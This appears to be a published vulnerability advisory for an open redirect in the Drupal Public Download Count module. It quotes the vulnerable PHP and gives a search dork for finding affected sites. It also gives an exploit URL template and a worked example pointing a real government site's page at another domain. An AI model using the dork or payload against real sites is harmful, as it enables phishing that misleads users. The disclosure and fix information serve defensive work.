Drupal Public Download Count Module - Open Redirect

Published
Credit
Risk
2017.06.08
Snooper
Medium
CWE
CVE
Local
Remote
CWE-601
N/A
No
Yes
Dork: inurl:/sites/all/modules/pubdlcnt/pubdlcnt.php

# Exploit Title: Drupal Public Download Count Module - Open Redirect
# Date: 8-6-2017
# Software Link: https://www.drupal.org/project/pubdlcnt
# Exploit Author: Snooper
# Contact: https://t.me/Snbig
# CWE: CWE-601
# Risk: Low
# Category: webapps
# Tested on: Kali Linux
# Vulnerable File: pubdlcnt.php
# Dork: inurl:/sites/all/modules/pubdlcnt/pubdlcnt.php
# Version: 7.x-3.1 and lower

1. Description

An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation.
This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it .

2. Vulnerable Code :

$url = check_url($_GET['file']);
$nid = check_url($_GET['nid']);
if (!eregi("^(f|ht)tps?:\/\/.*", $url)) { // check if this is absolute URL
// if the URL is relative, then convert it to absolute
$url = "http://" . $_SERVER['SERVER_NAME'] . $url;
}
if (is_valid_file_url($url)) {
$filename = basename($url);
pubdlcnt_update_counter($url, $filename, $nid);
header('Location: ' . $url);
exit;


3. Exploit :

http://host/sites/all/modules/pubdlcnt/pubdlcnt.php?file=[ Open Redirect Vul ]

4. Example :

https://www.stats.gov.sa/sites/all/modules/pubdlcnt/pubdlcnt.php?file=http://leader.ir

5. Solution :
Update to version 8.x-1.x-dev
https://www.drupal.org/project/download_count/releases/8.x-1.x-dev

References:

https://www.owasp.org/index.php/Open_redirect
https://cwe.mitre.org/data/definitions/601.html


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com